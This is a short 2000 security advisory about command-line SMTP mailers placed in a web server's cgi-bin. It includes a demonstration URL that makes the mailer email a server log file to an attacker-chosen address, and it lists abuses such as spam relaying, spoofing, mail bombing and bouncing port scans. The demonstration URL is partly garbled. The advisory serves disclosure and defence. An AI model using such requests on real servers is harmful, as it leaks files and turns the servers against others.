Multiple Command Line SMTP Mailers Contain Vulnerabilities

Reported December 12, 2000 by XATO

VERSIONS AFFECTED

DESCRIPTIONMultiple vulnerabilities have been discovered in command-line mailers. Vulnerabilities range from Denial of Service (DoS) attacks to information leakage and the writing and retrieving of unauthorized data.

DEMONSTRATION

If the mailer software is located in the /cgi-bin directory on the Web server, a user can launch it with the following URL:http://yourserver/cgi-bin/mailer.exe  By adding a "-h" to the URL, as seen below, a user obtains a list of available options built into the mailer:http://yourserver/cgi-bin/mailer.exe?-hThe following command causes the mailer software to email the malicious user any file specified. In the case of this example, the Web server emails log files.-f%[email protected]%20-t%20me@example">http://yourserver/cgi-bin/mailer.exe?-f%20

[email protected]%20-t%20me@example. com%20-a%20c:logsweb.log Other issues discovered with the command-line mailer programs include the mailers also let malicious users specify the recipient and the sender, letting anyone use the server for unsolicited commercial email (UCE), flooding, mail bombing, resource draining, mail spoofing, and DoS. 

Additionally, other problems include the ability to let INI and log files reside in the same directory as the mailer; override the default settings; modify hidden form variables; exploit debug modes; monitor all mail sent through the server; use the mailer as a bounce point for port scans; use the mailer as a bounce point for brute-force password attacks.

VENDOR RESPONSE

Check your vendors web site for fix and upgrade information.

CREDITDiscovered by XATO